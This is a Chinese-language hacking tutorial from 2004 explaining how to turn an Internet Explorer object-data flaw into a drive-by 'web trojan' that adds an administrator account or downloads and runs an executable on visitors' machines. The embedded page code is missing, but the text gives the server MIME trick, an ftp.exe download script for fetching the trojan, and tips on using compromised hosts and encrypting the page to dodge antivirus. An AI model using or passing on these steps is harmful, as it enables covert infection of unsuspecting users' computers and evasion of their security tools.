利用Internet Explorer Object Data漏洞制做全新网页木马
关注+2004-10-08作者:蓝点
利用Internet Explorer Object Data漏洞制做全新网页木马 | |||
今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞。这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了。在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞。 --------------test.htm代码开始----------------- 这是个测试页,如果你的系统是w2k或xp,访问后将会增加一个用户名是lcx密码是lcxlcx的管理用户 ------------test.htm代码结束-------------- --------------test.htm中写到的test.test代码开始------------------ 我们的恶意页面已经构造完成,此时将test.htm和test.test放在网站同一目录里,像我是放http://127.0.0.1/下;直接打http://127.0.0.1/test.htm并不会在执行者的机器上执行test.test里的代码的,不会加一个用户是lcx密码是lcxlcx的管理用户的。我们还需要设置一下服务器的配置才行。漏洞描述中提到:Internet Explorer指定远程对象数据位置的参数没有充分检查被装载的文件属性。这段话具体是什么意思呢,怎样体现呢?请跟着我来做你就明白了:我们依次打开控制面板--管理工具--Internet 服务管理器-找一个web站点,像我的电脑是默认的web站点--右键属性--点http头,如图1。
然后再更改服务器的MIME映射,使扩展名.test对应为application/hta。做法就是点图1的文件类型图标,在弹出的文件类型对话框里点新增按扭,然后分别在关联扩展名输入框里写入.test,在内容类型(mime)里写入application/hta。如图2所示。
一切设置好后点确定了,我们此时再来打开test.htm,test.test里的恶意代码就会成功执行了。我执行test.htm时,我的最新升级的VRv杀毒软件竟然一点提示都没有。 值得注意的是,由于我的test.htm调用文件是test.test,文件后缀是.test,所以在iis管理器里(图1图2)用application/hta来对应.test。如果你调用的是test.xxx,那么你也要在iis管理器里用application/hta对应.xxx。 这两段代码只是在被执行者的机器里加一个用户而已,难道不能执行一个exe木马吗?当然可以!我用了一个晚上的时间,终于将这段代码写好了,而且调试也成功了。在写出这段代码前,大家先来复习一下如何在dos下用ftp.exe命令来下载文件。 假设我的ftp服务器是127.0.0.1,用户名是lcx,密码是123456,服务器上有一个xxx.exe文件,如何来下载呢?很简单,先写一个ftp.txt文本文件,内容如下: open 127.0.0.1 lcx 123456 get xxx.exe bye 然后我们把ftp.txt和ftp.exe放在同一目录下,执行ftp -s:ftp.txt这个命令,一会功夫,xxx.exe就会从ftp服务器里下载到前目录了。如图3所示。
好,知道了这些,我们把test.test的内容改造如下: --------------test.htm中写到的test.test改造后的代码开始------------------
这样,我将test.htm、test.test、xxx.exe放在我的服务器127.0.0.1下,让别人访http://127.0.0.1/test.htm,访问者的机器就会自动下载并执行xxx.exe这个木马。看了我的介绍,你是不是又学会了一种全新的网页木马制做方法了?为了大家方便,我已将test.htm和2个test.test的源码放在光盘里了,如果你要用的话,请稍微做下相应修改就可以了。不过,lcx可要提醒你两点呀。第一做这个木马最好用肉鸡来做,普通空间没有人会帮你在iis管理器里设置application/hta对应.test。第二是test.test里会写入你的ftp帐号密码信息,所以你做网页木马时可别用你的收费空间。即使用了免费空间,最好也将test.test的html源码加下密。 |
